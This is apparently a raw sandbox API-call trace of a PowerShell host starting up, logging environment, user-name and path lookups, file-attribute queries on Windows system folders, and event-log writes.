	[0342.519] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eef510*="Variable", lpRawData=0x2eef2a0) returned 1
	[0342.521] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0342.521] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.521] CoTaskMemFree (pv=0x100100) 
	[0342.523] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0342.523] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.523] CoTaskMemFree (pv=0x100100) 
	[0342.972] CoTaskMemAlloc (cb=0x804) returned 0x1b91a6c0
	[0342.972] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b91a6c0, nSize=0x26d348 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d348) returned 0x1
	[0342.972] CoTaskMemFree (pv=0x1b91a6c0) 
	[0342.972] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0342.972] GetUserNameW (in: lpBuffer=0x114ad0, pcbBuffer=0x26d388 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d388) returned 1
	[0342.972] CoTaskMemFree (pv=0x114ad0) 
	[0342.973] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f03128*="Certificate", lpRawData=0x2f02eb8) returned 1
	[0343.292] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0343.292] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0343.292] CoTaskMemFree (pv=0x100100) 
	[0343.296] GetLogicalDrives () returned 0x4
	[0343.296] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0343.296] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0343.298] CoTaskMemAlloc (cb=0x20e) returned 0x167730
	[0343.298] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x167730 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0343.298] CoTaskMemFree (pv=0x167730) 
	[0343.299] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0343.299] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0343.299] CoTaskMemFree (pv=0x100100) 
	[0343.300] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0343.300] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0343.300] CoTaskMemFree (pv=0x100100) 
	[0343.314] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0343.314] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0343.314] CoTaskMemFree (pv=0x100100) 
	[0343.317] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0343.317] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0343.317] CoTaskMemFree (pv=0x100100) 
	[0343.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0343.318] SetErrorMode (uMode=0x1) returned 0x1
	[0343.318] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26cf90 | out: lpFileInformation=0x26cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0343.318] SetErrorMode (uMode=0x1) returned 0x1
	[0343.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0343.318] SetErrorMode (uMode=0x1) returned 0x1
	[0343.318] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26cf90 | out: lpFileInformation=0x26cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0343.318] SetErrorMode (uMode=0x1) returned 0x1
	[0343.327] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0343.327] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0343.327] CoTaskMemFree (pv=0x100100) 
	[0343.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0343.333] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cd40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0343.531] SetErrorMode (uMode=0x1) returned 0x1
	[0343.531] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26cf50 | out: lpFileInformation=0x26cf50*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0343.531] SetErrorMode (uMode=0x1) returned 0x1
	[0343.531] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cd40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0343.531] SetErrorMode (uMode=0x1) returned 0x1
	[0343.531] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26cf50 | out: lpFileInformation=0x26cf50*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0343.531] SetErrorMode (uMode=0x1) returned 0x1
	[0343.531] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cd50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0343.531] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26cc40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0343.532] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0343.532] SetErrorMode (uMode=0x1) returned 0x1
	[0343.532] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26cf50 | out: lpFileInformation=0x26cf50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0343.532] SetErrorMode (uMode=0x1) returned 0x1
	[0343.532] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0343.532] SetErrorMode (uMode=0x1) returned 0x1
	[0343.532] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26cf50 | out: lpFileInformation=0x26cf50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0343.532] SetErrorMode (uMode=0x1) returned 0x1
	[0343.532] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0343.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x26cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0343.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0343.533] SetErrorMode (uMode=0x1) returned 0x1
	[0343.533] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26cf50 | out: lpFileInformation=0x26cf50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0343.533] SetErrorMode (uMode=0x1) returned 0x1
	[0343.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0343.533] SetErrorMode (uMode=0x1) returned 0x1
	[0343.533] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26cf50 | out: lpFileInformation=0x26cf50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0343.533] SetErrorMode (uMode=0x1) returned 0x1
	[0343.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0343.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x26cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0343.534] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0343.534] SetErrorMode (uMode=0x1) returned 0x1
	[0343.534] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26cf90 | out: lpFileInformation=0x26cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0343.534] SetErrorMode (uMode=0x1) returned 0x1
	[0343.534] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0343.534] SetErrorMode (uMode=0x1) returned 0x1
	[0343.534] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26cf90 | out: lpFileInformation=0x26cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0343.534] SetErrorMode (uMode=0x1) returned 0x1
	[0343.534] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0343.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x26cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0343.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0343.535] SetErrorMode (uMode=0x1) returned 0x1
	[0343.535] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26cf90 | out: lpFileInformation=0x26cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0343.535] SetErrorMode (uMode=0x1) returned 0x1
	[0343.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0343.535] SetErrorMode (uMode=0x1) returned 0x1
	[0343.535] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26cf90 | out: lpFileInformation=0x26cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0343.535] SetErrorMode (uMode=0x1) returned 0x1
	[0343.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0343.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x26cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0343.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0343.537] SetErrorMode (uMode=0x1) returned 0x1
	[0343.537] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d250 | out: lpFileInformation=0x26d250*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0343.538] SetErrorMode (uMode=0x1) returned 0x1
	[0343.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.819] CoTaskMemAlloc (cb=0x804) returned 0x1b91a6c0
	[0343.819] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b91a6c0, nSize=0x26d5b8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d5b8) returned 0x1
	[0343.819] CoTaskMemFree (pv=0x1b91a6c0) 
	[0343.819] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0343.819] GetUserNameW (in: lpBuffer=0x114ad0, pcbBuffer=0x26d5f8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d5f8) returned 1
	[0343.820] CoTaskMemFree (pv=0x114ad0) 
	[0343.820] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f3be10*="Available", lpRawData=0x2f3bba0) returned 1
	[0344.171] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0344.171] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.171] CoTaskMemFree (pv=0x100100) 
	[0344.171] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0344.171] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.171] CoTaskMemFree (pv=0x100100) 
	[0344.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.174] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0344.174] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0344.174] CoTaskMemFree (pv=0x100100) 
	[0344.174] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0344.174] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0344.174] CoTaskMemFree (pv=0x100100) 
	[0344.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.176] GetCurrentProcessId () returned 0x85c
	[0344.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
